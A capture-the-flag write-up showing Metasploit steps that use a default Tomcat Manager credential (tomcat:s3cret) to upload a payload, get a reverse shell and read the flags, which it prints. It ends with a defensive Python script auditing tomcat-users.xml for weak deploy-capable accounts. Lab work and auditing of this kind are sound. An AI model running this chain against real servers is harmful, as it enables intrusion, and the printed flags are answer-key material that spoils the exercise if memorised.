Vulnerabilities

Apache

  • I will start by checking out the webserver from a browser.

http://[Target IP]:8080

  • Looks like I get the default web page for Apache Tomcat version 7.0.88.

  • Let's see if we can find any vulnerabilities for it.

Meterpreter

  • I'll start by looking through Metasploit.

msfconsole
search tomcat

  • Exploit 28 looks like it could be something, so I will check that one out.

use 28
info

  • Checking out the link for Exploit-DB gives us some info on the exploit.

    • It looks like the exploit "should" work.

    • Unfortunately, after inputting the options for the exploit and checking it, it comes back as not exploitable. Let's try some of the others.

  • After doing some further enumerating, I got some credentials that I can use with one of the Metasploit exploits: tomcat:s3cret

use multi/http/tomcat_mgr_upload
show options

  • Set the options to the correct parameters.

exploit

  • And now we have a reverse shell into the system.

  • We also have administrator privileges.

  • Now we can just navigate over to the administrator's profile to find a single text file with both flags.

cd C:\Users\Administrator\Desktop\flags
type "2 for the price of 1.txt"

User Flag

7004dbcef0f854e0fb401875f26ebd00

Root Flag

04a8b36e1545a455393d067e772fe90e
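
The foothold above came from a guessable Tomcat Manager credential (tomcat:s3cret) on an account allowed to deploy applications. As an added example that is not part of the original write-up, this Python check audits a tomcat-users.xml for that condition; the denylist and the sample file are constructed, and it assumes passwords are stored in plaintext rather than digested.

```python
import xml.etree.ElementTree as ET

# Tomcat Manager roles that permit deploying a web application.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
# Constructed denylist for illustration; "s3cret" is the password seen above.
WEAK_PASSWORDS = {"", "s3cret", "tomcat", "admin", "password", "changeit"}

def audit_tomcat_users(xml_text):
    """Return (username, severity, detail) for accounts that can deploy apps."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        # Newer files declare an XML namespace, so compare the local tag name.
        if el.tag.rsplit("}", 1)[-1] != "user":
            continue
        name = el.get("username", "")
        password = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",")}
        deploy = sorted(roles & DEPLOY_ROLES)
        if not deploy:
            continue  # e.g. manager-status only: cannot upload a WAR
        weak = password.lower() in WEAK_PASSWORDS or password.lower() == name.lower()
        if weak:
            findings.append((name, "HIGH", "guessable password on " + ",".join(deploy)))
        else:
            findings.append((name, "REVIEW", "deploy-capable account: " + ",".join(deploy)))
    return findings

# Constructed sample file, not taken from the target machine.
SAMPLE = """<tomcat-users>
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="deployer" password="constructed-Long-Passphrase-91" roles="manager-script"/>
  <user username="viewer" password="viewer" roles="manager-status"/>
</tomcat-users>"""

if __name__ == "__main__":
    for user, severity, detail in audit_tomcat_users(SAMPLE):
        print(f"{severity:6} {user}: {detail}")
```

REVIEW findings are accounts to confirm are still needed and reachable only from trusted addresses.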
